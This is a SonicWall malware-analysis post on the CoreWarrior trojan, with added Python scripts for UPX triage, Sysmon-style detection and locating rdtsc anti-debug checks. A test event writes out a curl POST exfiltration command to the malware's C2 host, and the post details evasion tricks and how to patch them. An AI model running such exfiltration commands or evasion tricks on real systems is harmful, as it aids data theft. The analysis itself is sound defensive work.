Effective URL: https://blog.sonicwall.com/en-us/2024/10/corewarrior-spreader-malware-surge/
COREWARRIOR SPREADER MALWARE SURGE

By Security News
October 11, 2024

OVERVIEW

This week, the SonicWall Capture Labs threat research team investigated a sample
of CoreWarrior malware. This is a persistent trojan that attempts to spread
rapidly by creating dozens of copies of itself and reaching out to multiple IP
addresses, opening multiple sockets for backdoor access, and hooking Windows UI
elements for monitoring.

INFECTION CYCLE

The malware is a UPX-packed executable that has been manually tampered with and
will not unpack using the standard UPX unpacker.





Figures 1 (top) and 2 (bottom): Initial detection, and failure to unpack due to a checksum error
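The unpack failure in Figures 1 and 2 is what a hand-edited UPX header looks like from the unpacker's side. The script below is an added example, not code from the original post or from SonicWall: it triages a PE for UPX traces the way an analyst would before resorting to a manual unpack, reading the section table, scoring section entropy, locating the `UPX!` pack header and recomputing its checksum. The header layout and checksum rule (sum of the header bytes between the magic and the final byte, modulo 251) follow the 32-byte PackHeader UPX writes for 32-bit formats as the author of this example understands it; the sample PE is constructed inside the script and is not the CoreWarrior binary, and its section names, sizes, header field values and the 7.0 entropy threshold are assumptions.

```python
"""Static triage of a PE for UPX packing traces, including the UPX pack header
checksum that a tampered sample fails. Added example; sample PE is constructed."""
import hashlib
import math
import struct

UPX_MAGIC = b"UPX!"
PACKHEADER_LEN = 32  # UPX PackHeader size for 32-bit formats (header version >= 13)


def upx_header_checksum(hdr):
    """UPX sums the header bytes between the magic and the final byte, modulo 251."""
    return sum(hdr[4:PACKHEADER_LEN - 1]) % 251


def parse_upx_header(hdr):
    """Return the PackHeader fields, or None if `hdr` does not start with the magic."""
    if len(hdr) < PACKHEADER_LEN or hdr[:4] != UPX_MAGIC:
        return None
    version, fmt, method, level = hdr[4:8]
    u_adler, c_adler, u_len, c_len, u_file_size = struct.unpack_from("<5I", hdr, 8)
    return {"version": version, "format": fmt, "method": method, "level": level,
            "u_adler": u_adler, "c_adler": c_adler, "u_len": u_len, "c_len": c_len,
            "u_file_size": u_file_size,
            "checksum_ok": hdr[PACKHEADER_LEN - 1] == upx_header_checksum(hdr)}


def shannon_entropy(data):
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def pe_sections(data):
    """Parse the section table: (name, virtual_size, virtual_addr, raw_size, raw_ptr)."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    nsec = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size
    secs = []
    for i in range(nsec):
        off = table + 40 * i
        name = data[off:off + 8].rstrip(b"\0").decode("latin-1")
        secs.append((name,) + struct.unpack_from("<4I", data, off + 8))
    return secs


def triage(data):
    """Return a list of finding strings for the given PE bytes."""
    findings = []
    secs = pe_sections(data)
    if any(name.startswith("UPX") for name, *_ in secs):
        findings.append("upx-section-names")
    # Classic UPX layout: the first section has no raw data but a large virtual
    # size, because the stub decompresses into it at run time.
    if secs and secs[0][3] == 0 and secs[0][1] > 0:
        findings.append("empty-first-section")
    for name, _vsize, _vaddr, rawsize, rawptr in secs:
        if rawsize and shannon_entropy(data[rawptr:rawptr + rawsize]) > 7.0:
            findings.append("high-entropy:" + name)
    idx = data.rfind(UPX_MAGIC)
    if idx < 0:
        findings.append("no-upx-magic")  # magic stripped: upx -d will refuse outright
    else:
        hdr = parse_upx_header(data[idx:idx + PACKHEADER_LEN])
        findings.append("upx-header-ok" if hdr and hdr["checksum_ok"] else "upx-header-corrupt")
    return findings


def build_sample_pe(tamper=False):
    """Constructed minimal PE with UPX0/UPX1/.rsrc sections; NOT the CoreWarrior sample."""
    compressed = b"".join(hashlib.sha256(i.to_bytes(4, "little")).digest() for i in range(63))
    hdr = bytearray(UPX_MAGIC + bytes([13, 36, 2, 8])  # assumed version/format/method/level
                    + struct.pack("<5I", 0x12345678, 0x9ABCDEF0, 0x20000, len(compressed), 0x22000)
                    + bytes([0x46, 0, 0, 0]))
    hdr[PACKHEADER_LEN - 1] = upx_header_checksum(hdr)
    if tamper:
        hdr[16] ^= 0xFF  # manual edit of u_len without fixing the checksum byte
    upx1 = compressed + bytes(hdr)
    rsrc = b"\0" * 0x200
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 3, 0, 0, 0, 0xE0, 0x0102)
    opt = b"\x0B\x01" + b"\0" * (0xE0 - 2)

    def sec(name, vsize, vaddr, rawsize, rawptr, flags):
        return name.ljust(8, b"\0") + struct.pack("<IIIIIIHHI", vsize, vaddr, rawsize, rawptr, 0, 0, 0, 0, flags)

    table = (sec(b"UPX0", 0x10000, 0x1000, 0, 0, 0xE0000080)
             + sec(b"UPX1", 0x1000, 0x11000, len(upx1), 0x200, 0xE0000040)
             + sec(b".rsrc", 0x200, 0x12000, len(rsrc), 0x200 + len(upx1), 0xC0000040))
    headers = dos + coff + opt + table
    return headers + b"\0" * (0x200 - len(headers)) + upx1 + rsrc


if __name__ == "__main__":
    for tampered in (False, True):
        print("tampered" if tampered else "clean", triage(build_sample_pe(tampered)))
```

A binary that shows UPX0/UPX1 sections and a high-entropy code section but reports no magic or a corrupt header fits the profile the post describes; the practical move then is to repair the header by hand or to let the stub unpack itself and dump the process from memory, rather than retrying the standard unpacker.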

At runtime, the executable creates a copy of itself with a randomly generated
name. The copy launches a command prompt and uses curl to POST data to
“http://wecan.hasthe(dot)technology/upload”. Each time a POST completes, the
parent process deletes the existing copy and creates a new one. During testing,
one hundred and seventeen copies were created and deleted in under ten minutes.



Figure 3: Malware is connecting to site and posting data

While these messages are being sent, the program also binds listeners on ports
49730-49777 and 50334-50679. A single connection was made to a secondary IP
address, 172.67.183.40, but no further TCP/UDP traffic followed.



Figure 4: Multi-part output of data sent
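The runtime behaviour above gives three independent detection hooks: a randomly named executable launching cmd.exe, which runs curl to POST to the C2 URL; a tight loop of .exe creations and deletions by one process; and the contact to 172.67.183.40. The script below is an added example and not SonicWall's detection content. It runs over constructed Sysmon-style process-create, file-create and network-connect events (Event IDs 1, 11 and 3) embedded in the script; the C2 hostname is the post's defanged URL written out, while the 203.0.113.10 resolution, the dropper path, the event timestamps and the churn threshold (20 .exe creations by one process within five minutes) are assumptions.

```python
"""Detection logic for the CoreWarrior runtime behaviour described above,
run over constructed Sysmon-style events (Event IDs 1, 11, 3). Added example."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

C2_HOSTS = {"wecan.hasthe.technology"}   # the post's defanged URL, written out
C2_IPS = {"172.67.183.40"}
CHURN_THRESHOLD = 20                     # .exe creations by one process ...
CHURN_WINDOW = timedelta(minutes=5)      # ... within this window (assumed threshold)
POST_FLAGS = re.compile(r"(?:^|\s)(?:-X\s*POST|-d\b|--data\b|-F\b)")
URL = re.compile(r"https?://[^\s\"']+")


def detect_curl_post(events):
    """Event ID 1: curl.exe spawned by cmd.exe with a POST-style command line."""
    hits = []
    for e in events:
        if e["EventID"] != 1:
            continue
        if not (e["Image"].lower().endswith("\\curl.exe")
                and e["ParentImage"].lower().endswith("\\cmd.exe")):
            continue
        if not POST_FLAGS.search(e["CommandLine"]):
            continue
        m = URL.search(e["CommandLine"])
        hits.append({"rule": "curl-post-from-cmd", "url": m.group(0) if m else None})
    return hits


def detect_exe_churn(events):
    """Event ID 11: one process writing many .exe files in a short window."""
    per_proc = defaultdict(list)
    for e in events:
        if e["EventID"] == 11 and e["TargetFilename"].lower().endswith(".exe"):
            per_proc[e["Image"]].append(datetime.fromisoformat(e["UtcTime"]))
    hits = []
    for image, times in per_proc.items():
        times.sort()
        start = 0
        for end in range(len(times)):          # sliding window over sorted timestamps
            while times[end] - times[start] > CHURN_WINDOW:
                start += 1
            if end - start + 1 >= CHURN_THRESHOLD:
                hits.append({"rule": "exe-create-churn", "image": image, "count": end - start + 1})
                break
    return hits


def detect_c2_connections(events):
    """Event ID 3: any outbound connection to the known C2 host or IP."""
    hits = []
    for e in events:
        if e["EventID"] != 3:
            continue
        host = e.get("DestinationHostname", "").lower().rstrip(".")
        ip = e.get("DestinationIp", "")
        if host in C2_HOSTS or ip in C2_IPS:
            hits.append({"rule": "known-c2", "image": e["Image"], "dst": host or ip})
    return hits


def run_all(events):
    return detect_curl_post(events) + detect_exe_churn(events) + detect_c2_connections(events)


def build_sample_events():
    """Constructed telemetry mirroring the described behaviour; not real logs."""
    t0 = datetime(2024, 10, 11, 9, 0, 0)
    dropper = r"C:\Users\victim\AppData\Local\Temp\k3j9x2qz.exe"   # assumed random name
    curl = r"C:\Windows\System32\curl.exe"
    cmd = r"C:\Windows\System32\cmd.exe"
    events = [
        {"EventID": 1, "UtcTime": "2024-10-11 09:00:01", "Image": curl, "ParentImage": cmd,
         "CommandLine": 'curl -X POST -d "host=WIN-TEST" http://wecan.hasthe.technology/upload'},
        {"EventID": 3, "UtcTime": "2024-10-11 09:00:02", "Image": curl,
         "DestinationHostname": "wecan.hasthe.technology", "DestinationIp": "203.0.113.10"},
        {"EventID": 3, "UtcTime": "2024-10-11 09:00:05", "Image": dropper,
         "DestinationHostname": "", "DestinationIp": "172.67.183.40"},
        # benign control: an interactive GET is not flagged by the curl rule
        {"EventID": 1, "UtcTime": "2024-10-11 09:01:00", "Image": curl, "ParentImage": cmd,
         "CommandLine": "curl https://example.com/"},
    ]
    for i in range(25):  # copy-and-delete loop: a new randomly named .exe every 10 s
        events.append({"EventID": 11, "UtcTime": (t0 + timedelta(seconds=10 * i)).isoformat(" "),
                       "Image": dropper,
                       "TargetFilename": rf"C:\Users\victim\AppData\Local\Temp\cp{i:03d}.exe"})
    return events


if __name__ == "__main__":
    for hit in run_all(build_sample_events()):
        print(hit)
```

The churn rule is the one that survives a change of C2 infrastructure: a process that writes and removes dozens of executables in minutes is abnormal regardless of where the POSTs go, whereas the hostname and IP matches are only as good as the indicator list.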

The parent process collects information on the system drives and hooks the
command prompt window to monitor it for changes. The malware has several
anti-analysis capabilities, including:

 * Anti-debugging: rdtsc is used to time execution, and the program exits if
   the elapsed time exceeds a threshold
 * Evasion: a randomized sleep timer whose value changes with the number of
   connection attempts, successes and failures (Figure 4)
 * VM detection: the binary contains strings used to check for HyperV
   containers



Figure 5: Variables used in sleep determinations
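To neutralise the rdtsc check during analysis you first have to find it in the unpacked code. The script below is an added example, not anything from the post or from the sample: it locates candidate timing checks statically by finding pairs of RDTSC opcodes (`0F 31`) close to each other, reads the immediate of a following `cmp eax, imm32` as the candidate threshold, and searches for Hyper-V related strings. The x86 fragment it scans is hand-assembled inside the script and is not CoreWarrior's code; the 64-byte pairing window, the 32-byte lookahead and the `hyper-v`/`hyperv` string list are assumptions (the post names only HyperV).

```python
"""Static locator for rdtsc timing checks and Hyper-V detection strings in
unpacked x86 code. Added heuristic example; the sample bytes are hand-assembled."""
import re

RDTSC = b"\x0f\x31"                   # x86 RDTSC opcode
CMP_EAX_IMM32 = 0x3D                  # cmp eax, imm32
PAIR_WINDOW = 64                      # max bytes between the two reads (assumption)
VM_STRINGS = [b"hyper-v", b"hyperv"]  # assumed list; the post names only "HyperV"


def find_rdtsc_pairs(code, window=PAIR_WINDOW):
    """Offsets (first, second) of RDTSC pairs within `window` bytes of each other.
    A lone 0F 31 is frequently data or part of another instruction; two close
    together are the start and end reads of a timing check."""
    offs = [m.start() for m in re.finditer(re.escape(RDTSC), code)]
    return [(a, b) for a, b in zip(offs, offs[1:]) if b - a <= window]


def extract_threshold(code, second_rdtsc, lookahead=32):
    """Immediate of the first `cmp eax, imm32` after the second read, or None.
    This is where the 'exit if elapsed > threshold' decision is made and the
    natural place to patch (NOP the conditional jump or raise the constant)."""
    window = code[second_rdtsc + 2:second_rdtsc + 2 + lookahead]
    pos = window.find(bytes([CMP_EAX_IMM32]))
    if pos < 0 or pos + 5 > len(window):
        return None
    return int.from_bytes(window[pos + 1:pos + 5], "little")


def find_vm_strings(code):
    """Case-insensitive search for hypervisor-related strings."""
    low = code.lower()
    return [(s.decode(), m.start()) for s in VM_STRINGS for m in re.finditer(re.escape(s), low)]


# Hand-assembled x86 fragment shaped like a timing check (constructed, not CoreWarrior's code).
SAMPLE_CODE = (
    b"\x55\x8b\xec"                     # push ebp ; mov ebp, esp
    + b"\x0f\x31"                       # rdtsc                (t0 in edx:eax)
    + b"\x8b\xd8"                       # mov ebx, eax
    + b"\x90" * 8                       # the region being timed (NOPs stand in for work)
    + b"\x0f\x31"                       # rdtsc                (t1)
    + b"\x2b\xc3"                       # sub eax, ebx         (elapsed, low dword)
    + b"\x3d\x00\x00\x10\x00"           # cmp eax, 0x100000    (threshold)
    + b"\x76\x07"                       # jbe  fast_path
    + b"\x6a\x01\xe8\x00\x00\x00\x00"   # push 1 ; call ExitProcess (rel32 unresolved)
    + b"Hyper-V\x00"                    # string used by the VM check
    + b"\x00" * 200                     # unrelated data ...
    + b"\x0f\x31"                       # ... containing a stray 0F 31 (no partner: ignored)
)


def analyze(code):
    pairs = find_rdtsc_pairs(code)
    return {"timing_checks": [(a, b, extract_threshold(code, b)) for a, b in pairs],
            "vm_strings": find_vm_strings(code)}


if __name__ == "__main__":
    print(analyze(SAMPLE_CODE))
```

Once the pair and its threshold are located, the check can be defeated in a debugger by patching the conditional jump, or sidestepped by single-stepping only outside the timed region so the elapsed count stays below the constant; the stray `0F 31` at the end of the sample shows why pairing, rather than a raw opcode search, is needed to keep false positives down.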

The code also references the FTP, SMTP and POP3 protocols as channels for data
exfiltration.

SONICWALL PROTECTIONS

To protect SonicWall customers against this malware, the following signature
has been released:

 * CoreWarrior.A

IOCS

85A6E921E4D5107D13C1EB8647B130A1D54BA2B6409118BE7945FD71C6C8235F (packed)

8C97329CF7E48BB1464AC5132B6A02488B5F0358752B71E3135D9D0E4501B48D (unpacked)

Security News

The SonicWall Capture Labs Threat Research Team gathers, analyzes and vets
cross-vector threat information from the SonicWall Capture Threat network,
consisting of global devices and resources, including more than 1 million
security sensors in nearly 200 countries and territories. The research team
identifies, analyzes, and mitigates critical vulnerabilities and malware daily
through in-depth research, which drives protection for all SonicWall customers.
In addition to safeguarding networks globally, the research team supports the
larger threat intelligence community by releasing weekly deep technical analyses
of the most critical threats to small businesses, providing critical knowledge
that defenders need to protect their networks.
Categories: Threat intelligence
Tags: Security News
